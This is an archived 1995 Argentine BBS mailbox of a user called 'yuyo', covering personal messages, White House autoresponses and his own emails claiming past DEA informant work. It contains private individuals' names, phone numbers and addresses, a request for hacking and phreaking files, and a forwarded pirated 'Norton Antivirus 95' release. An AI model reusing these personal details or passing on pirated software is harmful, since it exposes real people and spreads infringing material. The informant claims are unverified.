con unos amigos que quieren conocer al gran YUYO. Solo para co nocerte y tomar unos cafes... Por el tema de Cesar y Carlitos, le dije a Cesar. Por ahora nada mas. Gracias. PD: Conseguiste la PC para vos? #*** Siguiente mensaje ***# Mens.: 38 De : MAILER-DAEMON A : yuyo Tema : Subject: Returned mail: Host unknown (Name server: whithose.gov: host not found) Fecha: 30/08/1995 07:08:55 Para: yuyo From MAILER-DAEMON Tue Aug 29 06:00:54 1995 remote from uunet Received: from localhost by relay3.UU.NET with internal id QQzewe00411; Tue, 29 Aug 1995 06:00:54 -0400 Date: Tue, 29 Aug 1995 06:00:54 -0400 From: uunet!MAILER-DAEMON (Mail Delivery Subsystem) Subject: Returned mail: Host unknown (Name server: whithose.gov: host not found) Message-Id: To: The original message was received at Tue, 29 Aug 1995 06:00:53 -0400 from uucp3.UU.NET [192.48.96.34] ----- The following addresses had delivery problems ----- (unrecoverable error) ----- Transcript of session follows ----- 501 ... 550 Host unknown (Name server: whithose.gov: host not found) ----- Original message follows ----- Return-Path: Received: from uucp3.UU.NET by relay3.UU.NET with SMTP id QQzewe00409; Tue, 29 Aug 1995 06:00:53 -0400 From: yuyo@mponline.com.ar Message-Id: Received: from mponline.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Tue, 29 Aug 1995 06:00:53 -0400 To: president@whithose.gov Subject: top urgent D.E.A. Top urgent Date: Mon Aug 28 23:22:37 rio 1995 Solicito que tenga a bien contactarme con el agente especial Ricardo Ramos y/o supervisor dado que usembasis bs.as. me a dejado de lado luego de 4 anios de trabajo arriesgando la vida. Y quisiera explayarme de lo que esta ocurriendo aqui. FIRMA SZ910014 #*** Siguiente mensaje ***# Mens.: 40 De : WhiteHouse.Gov!autoresponder A : yuyo Tema : Subject: Re: Top urgent D.E.A. Top urgent Fecha: 01/09/1995 07:05:16 Para: yuyo From WhiteHouse.Gov!autoresponder Fri Sep 1 05:55:55 1995 remote from uunet Received: from WhiteHouse.Gov by relay4.UU.NET with SMTP id QQzfhf19596; Fri, 1 Sep 1995 05:55:55 -0400 From: uunet!WhiteHouse.Gov!autoresponder Received: by WhiteHouse.Gov (5.65/fma/mjr-120691); id AA09791; Fri, 1 Sep 95 05:55:41 -0400 Date: Fri, 1 Sep 95 05:55:41 -0400 Message-Id: <9509010955.AA09791@WhiteHouse.Gov> Subject: Re: Top urgent D.E.A. Top urgent To: uunet!mponline.com.ar!yuyo Thank you for writing to President Clinton via electronic mail. Since June 1993, whitehouse.gov has received over 475,000 messages from people all across the country and the world. Because so many of you write, the President cannot personally review each message. The mail is first read by White House Correspondence staff. Your concerns, ideas, and suggestions are carefully recorded and communicated to the President weekly with a representative sampling of the mail. All of us at the White House are excited about the progress made with this historic project, and we look forward to future developments. Your continued interest and participation are very important to us. Sincerely, Stephen K. Horn Director, Presidential Email The Office of Correspondence P.S. Please read on - you may find the following information useful. -- This is the only electronic message you will receive from whitehouse.gov. No other message purporting to be from the President or his staff at whitehouse.gov is verifiable. If you have received such a message, you have been spoofed. You will receive only one autoresponder message per day. -- The only personal addresses at whitehouse.gov are the following: President@whitehouse.gov and Vice.President@whitehouse.gov Please write to The First Lady and Mrs. Gore by regular mail. The address is: The White House, Washington, D.C. 20500. -- Many are asking about the text for the State of the Union Address and about the List of Clinton Administration Accomplishments. These are available by email. See the instructions for publications retrieval below. -- On October 20, 1994, President Clinton and Vice President Gore increased the accessibility of government information by opening a World Wide Web home page called "Welcome to the White House: An Interactive Citizens' Handbook". This new WWW service provides a single point of access to all electronic government information on the Internet. "Welcome to the White House" can be accessed at: http://www.whitehouse.gov -- On January 5, 1995, The House of Representatives also established a new World Wide Web site for electronic access to bills before Congress (and other legislative data). Access the House Web site at: http://www.house.gov -- White House documents and publications are available by email. To receive instructions, please send a message to the following address (**do not "reply" to the memo you are now reading**): publications@whitehouse.gov In the body of your message, type "Send Info" (without quotes); no other text should be included (including message headers or signature lines (.sig files)). The instructions will be sent to you automatically. **************************************************************** State of the Union Address as delivered by the President on January 24, 1995. To retrieve the text, use the following commands: To: publications@whitehouse.gov Message body: send file 317535 List of Accomplishments (three documents compose the whole): To: publications@whitehouse.gov Message body: send file 317571 send file 317573 send file 317575 **************************************************************** -- The White House Public Access Email FAQ (Frequently Asked Questions) document is available at the following address. The FAQ, among other things, lists alternate sources of government information, i.e., the Congressional email projects. Send an email message (no text necessary) to: faq@whitehouse.gov (This FAQ address is an autoresponder only; any comment sent to this address will not be acknowledged.) #*** Siguiente mensaje ***# Mens.: 42 De : dc.uba.ar!gisvi A : yuyo Tema : Subject: Re: programa cable Fecha: 03/09/1995 07:10:13 Para: yuyo From dc.uba.ar!gisvi Sat Sep 2 11:59:12 1995 remote from uunet Received: from ccc.uba.ar by relay3.UU.NET with SMTP id QQzflv09962; Sat, 2 Sep 1995 11:59:12 -0400 Received: from dc.uba.ar by ccc.uba.ar with smtp (Smail3.1.28.1 #5) id m0soisi-000E5OC; Sat, 2 Sep 95 01:04 GMT-1:00 Received: by dc.uba.ar (Smail3.1.29.1 #1) id m0soIyt-000GkVC; Thu, 31 Aug 95 20:25 GMT-3:00 Message-Id: From: uunet!dc.uba.ar!gisvi (Grupo Investigacion Virus ) Subject: Re: programa cable To: uunet!mponline.com.ar!yuyo Date: Thu, 31 Aug 1995 20:25:11 -0300 (GMT-3:00) In-Reply-To: from "yuyo@mponline.com.ar" at Aug 28, 95 11:17:13 pm X-Mailer: ELM [version 2.4 PL13] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 0 #*** Siguiente mensaje ***# Mens.: 43 De : WhiteHouse.Gov!autoresponder A : yuyo Tema : Subject: Re: DEA Fecha: 04/09/1995 06:59:07 Para: yuyo From WhiteHouse.Gov!autoresponder Sun Sep 3 06:11:10 1995 remote from uunet Received: from WhiteHouse.Gov by relay1.UU.NET with SMTP id QQzfoq23028; Sun, 3 Sep 1995 06:11:10 -0400 From: uunet!WhiteHouse.Gov!autoresponder Received: by WhiteHouse.Gov (5.65/fma/mjr-120691); id AA08905; Sun, 3 Sep 95 06:10:58 -0400 Date: Sun, 3 Sep 95 06:10:58 -0400 Message-Id: <9509031010.AA08905@WhiteHouse.Gov> Subject: Re: DEA To: uunet!mponline.com.ar!yuyo Thank you for writing to President Clinton via electronic mail. Since June 1993, whitehouse.gov has received over 475,000 messages from people all across the country and the world. Because so many of you write, the President cannot personally review each message. The mail is first read by White House Correspondence staff. Your concerns, ideas, and suggestions are carefully recorded and communicated to the President weekly with a representative sampling of the mail. All of us at the White House are excited about the progress made with this historic project, and we look forward to future developments. Your continued interest and participation are very important to us. Sincerely, Stephen K. Horn Director, Presidential Email The Office of Correspondence P.S. Please read on - you may find the following information useful. -- This is the only electronic message you will receive from whitehouse.gov. No other message purporting to be from the President or his staff at whitehouse.gov is verifiable. If you have received such a message, you have been spoofed. You will receive only one autoresponder message per day. -- The only personal addresses at whitehouse.gov are the following: President@whitehouse.gov and Vice.President@whitehouse.gov Please write to The First Lady and Mrs. Gore by regular mail. The address is: The White House, Washington, D.C. 20500. -- Many are asking about the text for the State of the Union Address and about the List of Clinton Administration Accomplishments. These are available by email. See the instructions for publications retrieval below. -- On October 20, 1994, President Clinton and Vice President Gore increased the accessibility of government information by opening a World Wide Web home page called "Welcome to the White House: An Interactive Citizens' Handbook". This new WWW service provides a single point of access to all electronic government information on the Internet. "Welcome to the White House" can be accessed at: http://www.whitehouse.gov -- On January 5, 1995, The House of Representatives also established a new World Wide Web site for electronic access to bills before Congress (and other legislative data). Access the House Web site at: http://www.house.gov -- White House documents and publications are available by email. To receive instructions, please send a message to the following address (**do not "reply" to the memo you are now reading**): publications@whitehouse.gov In the body of your message, type "Send Info" (without quotes); no other text should be included (including message headers or signature lines (.sig files)). The instructions will be sent to you automatically. **************************************************************** State of the Union Address as delivered by the President on January 24, 1995. To retrieve the text, use the following commands: To: publications@whitehouse.gov Message body: send file 317535 List of Accomplishments (three documents compose the whole): To: publications@whitehouse.gov Message body: send file 317571 send file 317573 send file 317575 **************************************************************** -- The White House Public Access Email FAQ (Frequently Asked Questions) document is available at the following address. The FAQ, among other things, lists alternate sources of government information, i.e., the Congressional email projects. Send an email message (no text necessary) to: faq@whitehouse.gov (This FAQ address is an autoresponder only; any comment sent to this address will not be acknowledged.) #*** Siguiente mensaje ***# Mens.: 44 De : un1.satlink.com!satlink!caparros!Martin A : yuyo Tema : Fecha: 07/09/1995 07:08:09 Para: yuyo From un1.satlink.com!satlink!caparros!Martin Wed Sep 6 16:01:39 1995 remote from uunet Received: from un1.satlink.com by relay4.UU.NET with SMTP id QQzgbg13212; Wed, 6 Sep 1995 16:01:39 -0400 Received: from satlink.UUCP (Usatlink@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id QAA09625 for yuyo@mponline.com.ar; Wed, 6 Sep 1995 16:59:16 -0400 Message-Id: <199509062059.QAA09625@un1.satlink.com> Received: by satlink.net with uucp (FX UUCP) for yuyo@mponline.com.ar; Wed, 06 Sep 95 16:42:48 -0400 Received: from martin@caparros.satlink.net by WPEGWAF ver. á0.6 at Wed, 6 Sep 1995 16:42:04 ARG From: uunet!caparros.satlink.net!martin To: uunet!mponline.com.ar!yuyo Date: Wed, 6 Sep 1995 16:42:04 ARG Return-receipt-to: uunet!caparros.satlink.net!Martin Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) via SatLink UUCP te mando, como habiamos dicho, mi direcccion electronica que, como consta en el encabezamiento, es martin@caparros.satlink.net. Bueno, supongo que nos pondremos en contacto pronto. Un abrazo, martin --- Martin Caparros E-mail: martin@caparros.satlink.net Buenos Aires - Argentina #*** Siguiente mensaje ***# Mens.: 45 De : nw.com!nw A : yuyo Tema : Subject: Re: FORMAS PAGO Fecha: 09/09/1995 07:03:12 Para: yuyo From nw.com!nw Fri Sep 8 23:54:38 1995 remote from uunet Received: from nw.com by relay1.UU.NET with SMTP id QQzgjv19819; Fri, 8 Sep 1995 23:54:38 -0400 Received: from localhost (nw@localhost) by nw.com (8.6.5/8.6.5) id UAA11882 for yuyo@mponline.com.ar; Fri, 8 Sep 1995 20:56:35 -0700 Date: Fri, 8 Sep 95 20:56:34 PDT From: Network Wizards To: uunet!mponline.com.ar!yuyo Subject: Re: FORMAS PAGO In-Reply-To: Your message of Wed Sep 06 10:18:16 rio 1995 Message-ID: Hi - >My English is not very good, but y need know how to pay the CTEK, CTC900 and CTC >1150. Y resident in Argentina. Where y have the cash or the check? You can send a check to Network Wizards PO Box 343 Menlo Park, CA 94026 USA The price is: ctek $100 ctc900 $25 ctc1150 $25 shipping $10 thanks, Mark #*** Siguiente mensaje ***# Mens.: 46 De : walfav A : yuyo Tema : pruebas Fecha: 12/09/1995 16:13:21 hola!!!! #*** Siguiente mensaje ***# Mens.: 47 De : cabezon (fwd:cabezon) A : yuyo Tema : chistes hablados Fecha: 12/09/1995 17:47:07 ahi va un chiste de mi coleccion ------- Archivos adosados ------- YO.WAV .... 2822444 bytes --------------------------------- #*** Siguiente mensaje ***# Mens.: 48 De : yuyo A : yuyo Tema : provar Fecha: 12/09/1995 15:03:31 hola como te va queria saber como andas saludos yuyo ///////fin #*** Siguiente mensaje ***# Mens.: 49 De : dela A : yuyo Tema : ... Fecha: 13/09/1995 01:25:54 Te dejo los datos. Nombre : Jimena Apellido : Gomez Telefono : (059 llamando desde bs. as.) 425990 Montevideo (Uruguay ) Me olvide de preguntarte que tan seguro es esto, o sea, que riesgos hay.. trata de ser lo mas sincero posible ya que estoy confiando en vos totalmente al dejarte los datos y pedirte esto.. Chau, gracias.! #*** Siguiente mensaje ***# Mens.: 50 De : jazmin A : yuyo Tema : saludos Fecha: 13/09/1995 13:18:10 como estoy con un toco de trabajo no tengo mucho tirmpo para conversar[D[D[D[D[D [D[D[D[D[D asi que te mando un beso y espero que estes muy bien. chau, marisa #*** Siguiente mensaje ***# Mens.: 51 De : duracell A : yuyo Tema : modem.. Fecha: 13/09/1995 16:59:31 el modem es un usrobotics sportster de 28.8 (con v 34) si tenes algun fono de donde vas a estar alla dejame asi confirmamos lo del prec io.. #*** Siguiente mensaje ***# Mens.: 52 De : dela A : yuyo Tema : Hola! Fecha: 13/09/1995 20:58:45 Que tal! Te dejo este msg para sabes si te puedo llamar esta noche por telefono (por voz) .. parece que sabes mucho de esto.. me gustaria charlar un rato.. con tiempo seguramente debes tener cosas mas que interesantes para contar.. claro si queres dejame un msg con la hora a la que te puedo llamar.. Chau, suerte!: Gun. #*** Siguiente mensaje ***# Mens.: 53 De : elmalo (fwd:elmalo) A : yuyo Tema : hola! Fecha: 13/09/1995 21:10:57 ---------- COMENTARIO ---------- aca esta el forward del msg que te hab¡a enviado! es medio al pedo por que ya te pregunte por TE. chau! nos vemos. Ah! Tu telefono lo encrypte con un algoritmo mio de 3256 bits es medio enquilombado sacarlo! todo en orden ta la vista! ah! en el foro rev/varios estas el libro ese que me dijiste no se si esta completo, pero. ya lo bajo, chau -------------------------------- mira si sos yuyp hacker te pido me des una mano, ya que yo se bastante poco de hack y phreak, serias tan amable de pasarme lo que tengas de hack?? en el correo o en mi BBS o en el foro hobbies si sos tan amable.... POR FAVOOOOOOOOOOOOOOOOR!!! chau y gracias por adelantado #*** Siguiente mensaje ***# Mens.: 54 De : uki A : yuyo Tema : Fecha: 14/09/1995 19:25:57 Mira te estuve esperando pero me tengo que ir, me gustaria que sigamos escribiendonos, cualquier cosa yo me conecto o maniana despues del mediodia o a la noche..... Chau falso Yuyo Solamente [uki...] #*** Siguiente mensaje ***# Mens.: 55 De : uki A : yuyo Tema : Me voy vos sabes que se me hace muy tarde, chau uki Fecha: 14/09/1995 19:32:54 chau maniana nos escribimos #*** Siguiente mensaje ***# Mens.: 56 De : duracell A : yuyo Tema : ocupado Fecha: 14/09/1995 19:51:14 che cuando estoy ocupado es porque estoy adentro del mud te explico algunas cosas del mud para que tengas una idea de como entrar.. 1- pones mud 2- pones create barragan yuyo 3- donde barragan es el name y yuyo la clave.. eso lo elegis vos como quieras 4- una vez que estas adentro 5- poniendo : y algun texto hablas como si fuera tele por ejemplo :hola! apareceria barragan hola! 6- para ver quienes estan dentro del mud poner @who yo si estyo me llamo rastaman si me queres llamar a mi dentro del juego tenes que poner page por ejemplo page rastaman hola! como va? bueno espero que con esto puedas hacer algo por lo menos para llamar a alguno cu ando esta adentro del mud.. sino la otra que queda es hacer una teleconferencia cualquiera y mandarle la inv itacion con /invitar duracell che venite a la tele pd: creo que las invitaciones las lees aun estando dentro del mud..! bueno che nos vemos.. espero que esto que escribi te sirva... #*** Siguiente mensaje ***# Mens.: 57 De : chorro A : yuyo Tema : CHA CHAN CHA CHAN! Fecha: 15/09/1995 00:31:44 Bueno mi nombre lo sabes... Julian Lastiri y Marcel de Vasconcelos Montes... Fecha apox....fines de Diciembre.....NYC Alrededor de 20 dias.... IDA/VUELTA... #*** Siguiente mensaje ***# Mens.: 58 De : un1.satlink.com!caparros!Martin A : yuyo Tema : Subject: bogota Fecha: 15/09/1995 06:58:43 Para: yuyo From un1.satlink.com!caparros!Martin Tue Sep 12 17:14:20 1995 remote from uunet Received: from un1.satlink.com by relay3.UU.NET with SMTP id QQzgxo25740; Tue, 12 Sep 1995 17:14:20 -0400 Received: from caparros.UUCP (Ucaparro@localhost) by un1.satlink.com (8.6.11/8.6.11) with UUCP id SAA16857 for yuyo@mponline.com.ar; Tue, 12 Sep 1995 18:20:00 -0400 Message-Id: <199509122220.SAA16857@un1.satlink.com> Received: from martin@caparros.satlink.net by WPEGWAF ver. á0.6 at Tue, 12 Sep 1995 18:03:49 ARG From: uunet!caparros.satlink.net!martin To: uunet!mponline.com.ar!yuyo Date: Tue, 12 Sep 1995 18:03:49 ARG Subject: bogota Return-receipt-to: uunet!caparros.satlink.net!Martin Priority: normal X-Mailer: Pegasus Mail/Windows (v1.22) via SatLink UUCP Yuyo, como te decia, necesitaria dos pasajes para bogota para el 22 o 23 de septiembre -o por ahi. La vuelta para el 6 o 7 de octubre. Si no hay en avianca para esas fechas y podes conseguir otra, dale nomas, aunque seria mejor que fuera sin escalas. Los nombres son Martin Caparros y Antonio Caparros -mi hijo, que tiene cuatro (4) anos, atencion. Espero tu respuesta. Un abrazo. Martin. --- Martin Caparros E-mail: martin@caparros.satlink.net Buenos Aires - Argentina #*** Siguiente mensaje ***# Mens.: 59 De : duracell A : yuyo Tema : hola! Fecha: 15/09/1995 14:35:14 che buenos dias... yo es la primera vez en el dia que entro.. mi cuenta la usan otras 2 personas a veces.. vos por las dudas cuando no estas s egurrpo pregunta si soy dario... nos vemos! #*** Siguiente mensaje ***# Mens.: 60 De : walfav A : yuyo Tema : ctc Fecha: 15/09/1995 15:31:21 Disculpa, pasa que tamos con el tema de varios proc y andamos de aca para all.a. arce anda tambien con su causa. ok. tomada nota la clave. nos vemos luego. #*** Siguiente mensaje ***# Mens.: 61 De : dela A : yuyo Tema : ... Fecha: 15/09/1995 22:27:22 Decime a que hora te puedo llamar esta noche y arreglamos a que hora nos encontr amos ma¤ana, ok? cualquier cosa decime sino a que hora te puedo llamar ma¤ana... Chau, suerte!. /fi oops.. ahi deberia decir /fin :) #*** Siguiente mensaje ***# Mens.: 62 De : dela A : yuyo Tema : Reunion... Fecha: 16/09/1995 01:53:00 Hola, que tal! te dejo la direccion del lugar para encontrarnos.. direccion: Rivadavia 1424 , es como un cafe, se llama ' Gente Linda ' y es de mi hermana pero como tiene cerrado sabados y domingos, voy a ir yo, abro y los espero ahi (ya de paso tenemos pa tomar' y comer gratis :) queda en Rivadavia entre Parana y Uruguay... Yo voy a estar ahi.. te espero. es a las 18:00 Hs de ya hoy sabado. Chau, suerte! Gun. #*** Siguiente mensaje ***# Mens.: 63 De : dela A : yuyo Tema : ... Fecha: 16/09/1995 18:06:11 Bueno, ya son las 6 y no leiste el msg, y enok me dijo que tiene la pata esginsa da y no se puede mover, asi que no podia ir, igual hoy no voy a hacer nada me quedo en mi casa, cualquier cosa si queres que nos encontremos mas tarde dejame un msg y decime a que hora te llamo para arreglar a que hora nos encontramos alla, sino nos vemos a la noche por aca! Chau, suerte!. Gun. #*** Siguiente mensaje ***# Mens.: 64 De : dela A : yuyo Tema : ... Fecha: 16/09/1995 18:26:47 hola, mira voy a ir al local igual, voy a estar ahi con dos amigos de aca.. cualquier cosa llamame ahi al : 381- 8611 ok? Chau, suerte!. Gun. #*** Siguiente mensaje ***# Mens.: 65 De : duracell A : yuyo Tema : okap.. che eso de seguir de largo es jodido... Fecha: 16/09/1995 23:33:14 bastante jodido... yo por lo menos tardo como 3 dias en normarlizarme despues.. y bue che despues hablamos cuando vuelvas a la vida.. jejej bye saludos! #*** Siguiente mensaje ***# Mens.: 66 De : elmalo A : yuyo Tema : voy a cortar Fecha: 17/09/1995 18:22:27 corto y el telefono esta al lado de mi maquina si queres charlar noproblem, esto y probando la seguridad de mi BBS y implementando unas boludeces chau!!! :) #*** Siguiente mensaje ***# Mens.: 67 De : dela A : yuyo Tema : ... Fecha: 17/09/1995 19:32:08 Hola, tengo que cortar.. dejame un msg y decime a que hora te llamo ... chau, suerte!": Gun. #*** Siguiente mensaje ***# Mens.: 69 De : uki A : yuyo Tema : HI!!!!! Fecha: 17/09/1995 21:54:32 HOLA COMO ANDAS, COMO NO TE PODIA "LLAMAR", PORUQ E ESTAS BAJANDO ARCHIVOS, ESPERO NO SEAN LOS DE MI MAQUINA (CHISTE, CHISTE), TE DEJO ESTE MENSAJE PARA SOLO VER COMO ESTAS. [UKI...] #*** Siguiente mensaje ***# Mens.: 70 De : dela A : yuyo Tema : Aca te dejo las listas de bbs de U.S.A y alrededores :) Fecha: 18/09/1995 00:46:30 Hola, aca te dejo la lista, que ojala te puedas comunicar! siempre quise llamar a una bbs de afuera. Chau, suerte!: Gun. ------- Archivos adosados ------- 313bbs28.lst .... 58551 bytes 96listc4.zip .... 87844 bytes --------------------------------- #*** Siguiente mensaje ***# Mens.: 71 De : robert (fwd:robert) (fwd:cucurucho) (fwd:malaru) (fwd:codi) (fwd:duracell) A : yuyo Tema : Norton Antivirus 95 *SALES FINAL* Fecha: 18/09/1995 00:53:12 ---------- COMENTARIO ---------- Si ya lo pudiste hacer correr te va a servir sino para cuando lo instales. -------------------------------- ---------- COMENTARIO ---------- Toma. A ver si te sirve :) (solo para probarlo! -------------------------------- .----[Norton Antivirus 95 *SALES FINAL*]----. | The Best Virus Scanner For Windows 95!! | | The Store Shrinkwrap Release | | Version[Symantec (c) 1995] | | ._____.______ .__. /\.__ - OuTLaW | |-/ ___/ ___/ ¬\| | ___/ ¬| \------------| |/ /_.¬\ ._>_ \ |/__/\_ | _/GENERATiON-X| |\ | \ | ¬\ \ | / _ ¬\ 1995 | |-\___ /___ /_|\__|----\__| /------------| `-----\/evl-\/---[o8.21.95]--\/-----[o1/o3]-' ------- Archivos adosados ------- gnx-nav1.zip .... 1326353 bytes gnx-nav2.zip .... 954119 bytes gnx-nav3.zip .... 892265 bytes gnx-navf.zip .... 4242 bytes --------------------------------- #*** Siguiente mensaje ***# Mens.: 72 De : duracell (fwd:duracell) A : yuyo Tema : PARTIDOS PLANETS!!! Fecha: 18/09/1995 01:17:31 BUENO ACA COMIENZA LA BATALLA... ACA LES MANDO LA LISTA DE LOS QUE JUGAMOS Y LAS REGLAS.. Y EL RST DE CADA UNO. VA DESPUES.. BUENO LAS JUGADAS SON DE LUNES A VIERNES YO A LAS 23 DE CADA DIA LLAMO PARA BAJAR LOS RST, SI NO ESTAN.. PIERDEN EL TUR NO.. SI PIERDEN MAS DE 5 TURNOS SEGUIDOS SIN JUSTIFICAR.. NO JUEGAN MAS.. BUENO LA JUGADA QUEDO ASI.. ANGUS = THE FASCISTS. DURACELL = THE ROBOTS. CUCURUCHO = THE BIRDMEN. JFEDERICO = THE REBELS. ERNALV = THE EVIL EMPIRE. YUYO = THE COLONIES. HOWARD = THE LIZARDS. TOAD = THE PRIVATEERS. GEORGE (CHE) = THE CRYSTAL PEOPLE. BAYARD = THE CYBORGS. CAMO = THE FEDS. EN EL PROXIMO MENSAJE LES MANDO EL RST.. AUNQUE POR AHI TARDE HASTA MANIANA.. A ESO DE LAS 14 EN MANDARLOS.. BUENO.. HASTA LUEOGO.. #*** Siguiente mensaje ***# Mens.: 73 De : magu A : yuyo Tema : inter!! Fecha: 18/09/1995 03:00:30 mira yo de internet se muy poco pero como te decia preguntale a julian (usuario Julianag) que el la tine bastante clara eso si cualquier cosa que averigues comentame.... Chau..... nos vemos..... suerte..... magu (mario) #*** Siguiente mensaje ***# ------- Fin del envio fuera de linea ------- -------------------------------------------- Envio de mensajes fuera de linea MP OnLine! v2.2 - Offline reader 1.1 Mensajes de MP/correo/enviados -------------------------------------------- Mens.: 44 De : yuyo A : fernando@ubik.satlink.net Tema : persona Fecha: 17/08/1995 14:56:26 Atento Fernando, favor contactar via telefonica 54-1-9626761. espero te haya ido bien en el medico. saludos. yuyo. #*** Siguiente mensaje ***# Mens.: 45 De : yuyo A : jel Tema : Contacto Fecha: 18/08/1995 16:31:27 Hacer contacto esta noche. #*** Siguiente mensaje ***# Mens.: 46 De : yuyo A : gianni Tema : Contacto Fecha: 18/08/1995 16:32:06 Llamame hoy a mi casa. 962-6761. #*** Siguiente mensaje ***# Mens.: 47 De : yuyo A : fernando@ubik.satlink.net Tema : Reenvio. Fecha: 18/08/1995 16:39:09 regrese de C.D uruguay. necesito consigas los videos de Hadad y Longo. Tengo par a vos el video de uilmes, 2:10 hs de grabacion. te recuerdo, miercoles 23 salimo s en programa Macro a las 22:00. Grabalo. YUYO. #*** Siguiente mensaje ***# Mens.: 48 De : yuyo A : gianni Tema : PC Fecha: 23/08/1995 16:13:43 Habla con Alejandro para ver la posibilidad de conseguir una PC vieja y Modem pa ra instalarla en mi casa. Averigua si sale la nota en el mes proximo. Llamame a casa urgente. 962-6761. YUYO #*** Siguiente mensaje ***# Mens.: 49 De : yuyo A : walfav Tema : yuyo Fecha: 24/08/1995 22:56:58 Proxima semana viajo a Sanblo . comunicate con el jefe. dado que por telefono no puedo. necesito instrucciones sobrel ver a pepe. debido a que no logro comunicarme con ustedes. saludos yuyo. #*** Siguiente mensaje ***# Mens.: 50 De : yuyo A : fernando@ubik.satlink.net Tema : yuyo Fecha: 24/08/1995 22:59:38 comunicate en cuanto antes por el tema del domingo. el martes viajo a San Pablo. #*** Siguiente mensaje ***# Mens.: 51 De : yuyo A : gisvi@zorzal.edu.ar Tema : programa cable Fecha: 28/08/1995 23:17:14 Referente a tus declaracions me extranio tu posicion ya que el comisario Titrant e dice que no es delito. enfoca la cosa de otro modo y de ultima si sos valient e para decir que dos periodistas se jactan de el robo de pasajes y ademas de tu s injurias te pido un debate publico sobre el tema. coordiamente yuyo. pd: todo lo que escuche es mera copia de lo hablado por otros. con respecto al del codigo penal lee el cpp. lamento que no te respetaron ni el apellido. #*** Siguiente mensaje ***# Mens.: 52 De : yuyo A : walfav Tema : pepe gonzales Fecha: 28/08/1995 23:18:57 Favor de comunicarle a Cesar y Carlitos que necesito ubicarlos o ruinirnos porque no lospuedo ubicar. yuyo. #*** Siguiente mensaje ***# Mens.: 53 De : yuyo A : president@whithose.gov Tema : top urgent D.E.A. Top urgent Fecha: 28/08/1995 23:22:38 Solicito que tenga a bien contactarme con el agente especial Ricardo Ramos y/o supervisor dado que usembasis bs.as. me a dejado de lado luego de 4 anios de trabajo arriesgando la vida. Y quisiera explayarme de lo que esta ocurriendo aqui. FIRMA SZ910014 #*** Siguiente mensaje ***# Mens.: 54 De : yuyo A : walfav Tema : reunion Fecha: 29/08/1995 22:12:48 llamame por la maniana. yuyo #*** Siguiente mensaje ***# Mens.: 55 De : yuyo A : daniel@ubik.satlink.net Tema : brasil Fecha: 29/08/1995 22:14:15 Extrema importancia que manian nos encontremos . se confirmo operacion san pablo por 120.000.000 comunicate de cualquier forma. #*** Siguiente mensaje ***# Mens.: 56 De : yuyo A : president@whitehouse.gov Tema : Top urgent D.E.A. Top urgent Fecha: 30/08/1995 10:57:04 Solicito que tenga bien contactarme con el agente especial Ricardo Ramos y/o supervisor dedo que usembasis bs.as. me a dejado de lado luego de 4 anios de trabajo arriesgando la vida Y quisiera explayarme de lo que ha ocurrido FIRMA SZ910014 #*** Siguiente mensaje ***# Mens.: 57 De : yuyo A : daniel@ubik.satlink.net Tema : yuyo Fecha: 01/09/1995 01:21:30 necesito hablarte : tema un negocio que me salio y quiero que veas un material que tengo . yuyo #*** Siguiente mensaje ***# Mens.: 58 De : yuyo A : president@whitehouse.gov Tema : DEA Fecha: 02/09/1995 05:38:07 STEPHEN K. HORN DIRECTOR, PRESIDENCIAL E-MAIL THE OFFIE OF CORRESPONDENCE CON MI MAYOR RESPETO Y CONSIDERACION . HE RECIBIDO HOY SU AUTORESPONDER. MI NOMBRE ES RAUL HORACIO BARRAGAN Y HE TRABAJADO PARA LA D.E.A.. DURANTE 4 A¥OS A CAUSA DE ESO. ME COSTO UN A¥O Y UN MES EN CARCEL. EEUU HA INVERTIDO MUCHO DIRE NERO E INFORMACION CON MIGO. Y COSAS DE MUCHA IMPORTANCIA. HE ARRIESGADO MI VID A Y DE MI FAMILIA EN FORMA CONSTANTE PERO POR DIFERENCIA PRIMERO CON EL Sr. JEFE DE LA D.E.A. EN BS. AS. QUE ME ABANDONO. QUE DESCUBRI QUE TODOS SUS AGENTES DE LOS CUALES ELLOS ±±›±pwLáãåá Y HA SIDO CONDENADO A 10 A¥OS DE PRISION POR GRABACIONES QUE ELLOS POSEEN Y CON EL UNICO APOLLO QUE REALMENTE USTEDES DEBERAN FELICITAR AL Dr. RICARDO RAMOS QUE CONFIO EN MI Y EN TODAS CIRCUNSTANCIAS TRELACE A VUESTRA CAUSA Y A PESAR DE LA ENVIDIA POLICIAL SE ME CORTARON LOS LAS OS. ESTE ES MI ULTIMO TRABAJO MESAJE QUE LE ENVIO PORQUE ME SIENTO DESPROTEGIDO EN UN PAIS SEMI-DEMOCRATICO Y QUE TANTAS VECES ME UTILIZARON. ESTAN DESPROVECHANDOME O A LO MEJOR NO QUIEREN DESCUBRIR LA VERDADERA REALIDAD. PIDO QUE TOMEN MUCHA CONSIDERACION DE ESTE MENSAJE . SOLICITO QUE USTEDES SI LE INTERESA O NO QUE LO COMUNIQUEN YA SEA POR LA D.E.A O PARA MAYOR INFORMACION DEVIS SCREEN JEFE F.B.I. MONTE VIDEO. CREO QUE EN 4 O 5 DIAS ESTARE METIDO CON TODO EN LA INVESTIGACION DEL ATENTADO D DE LA AMIA Y LA ENBAJADA ISRAEILI. MI CODIGO ES SZA910014 . POR FAVOR CONTESTEME EN FORMA URGENTE PROQUE REALMENTE ASI PODRE ACTUAR CON CONV ICCION MORAL HACIA LO QUE USTEDES ME ENSE¥ARON. RAUL HORAIO BARRAGAN. S419626761 #*** Siguiente mensaje ***# Mens.: 59 De : WhiteHouse.Gov!autoresponder (fwd:yuyo) A : silvia Tema : Subject: Re: DEA Fecha: 04/09/1995 11:48:20 Para: yuyo From WhiteHouse.Gov!autoresponder Sun Sep 3 06:11:10 1995 remote from uunet Received: from WhiteHouse.Gov by relay1.UU.NET with SMTP id QQzfoq23028; Sun, 3 Sep 1995 06:11:10 -0400 From: uunet!WhiteHouse.Gov!autoresponder Received: by WhiteHouse.Gov (5.65/fma/mjr-120691); id AA08905; Sun, 3 Sep 95 06:10:58 -0400 Date: Sun, 3 Sep 95 06:10:58 -0400 Message-Id: <9509031010.AA08905@WhiteHouse.Gov> Subject: Re: DEA To: uunet!mponline.com.ar!yuyo Thank you for writing to President Clinton via electronic mail. Since June 1993, whitehouse.gov has received over 475,000 messages from people all across the country and the world. Because so many of you write, the President cannot personally review each message. The mail is first read by White House Correspondence staff. Your concerns, ideas, and 